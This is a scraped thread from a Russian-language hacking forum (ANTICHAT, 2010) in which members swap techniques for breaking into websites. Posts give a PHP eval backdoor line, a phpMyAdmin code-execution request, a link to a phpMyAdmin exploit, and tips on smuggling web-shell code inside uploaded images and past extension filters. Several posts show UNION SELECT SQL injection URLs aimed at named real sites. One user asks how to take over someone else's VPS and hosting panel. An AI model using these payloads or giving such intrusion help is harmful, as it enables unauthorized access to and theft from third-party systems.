HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13921  
Старый 17.06.2010, 19:48
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от pinch  
нет пробовал грит "файл с таким именем уже есть!"
В таком случае, поищи в админке LFI, очень часто именно в админской части сайта меньше всего защиты от атак. Достаточно часто сталкивался с таким способом заливки, когда льется только картинка, и хтаццесс не залить, то лил картинку набитую кодом шелла, и инклудил в админке.
 
Ответить с цитированием

  #13922  
Старый 17.06.2010, 19:55
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

если в хтацессе прописаны запрещенные разрешения, то тести
php phps php3 php5 phtml phps pht
 
Ответить с цитированием

  #13923  
Старый 17.06.2010, 20:03
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от m0Hze  
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:
PHP код:
<?php
$sting 
= ${@eval($_REQUEST[c])};
?>
Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
Код:
/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
Э, я про /scripts/setup.php, я другую багу имел ввиду.
 
Ответить с цитированием

  #13924  
Старый 17.06.2010, 20:04
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

LFI на сайте и админке нигде нету, тестил расширения реультат 0 .....=((
 
Ответить с цитированием

  #13925  
Старый 17.06.2010, 23:57
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от Ctacok  
Э, я про /scripts/setup.php, я другую багу имел ввиду.
Ну типо ми тоже про /scripts/setup.php. На проверь:

Код:
http://www.melancholy.ru/phpmyadmin/scripts/setup.php
и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on

Если мы вообще говорим об одном и том же сплойте:

http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

про который вообще-то изначально писал wildshaman
 
Ответить с цитированием

  #13926  
Старый 18.06.2010, 00:15
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
Сообщение от None  
http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,@@version,4,5,6,7,8,9,10,11, 12,13+--+
5.0.81-log
А почему не работают обычные функции? Как например вывести данные из бд?

Или вот другой пример:

http://www.salvationprophecy.com/e107_plugins/userjournals_menu/userjournals.php?blog.-43++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+

там даже @@version не работает.
 
Ответить с цитированием

  #13927  
Старый 18.06.2010, 07:09
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Pashkela  
Ну типо ми тоже про /scripts/setup.php. На проверь:
Код:
http://www.melancholy.ru/phpmyadmin/scripts/setup.php
и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on
Если мы вообще говорим об одном и том же сплойте:
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
про который вообще-то изначально писал wildshaman
Да причём сплойт, ты на саму багу посмотри, как ты закроешь открытую ковычку?
 
Ответить с цитированием

  #13928  
Старый 18.06.2010, 11:52
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Скажу прямо...как узнать по имени домена где находится панель управления хостингом.

Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )
 
Ответить с цитированием

  #13929  
Старый 18.06.2010, 11:58
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

whois -> dns.

ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
 
Ответить с цитированием

  #13930  
Старый 18.06.2010, 12:45
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Цитата:
Сообщение от Ctacok  
whois -> dns.
ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик.

Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.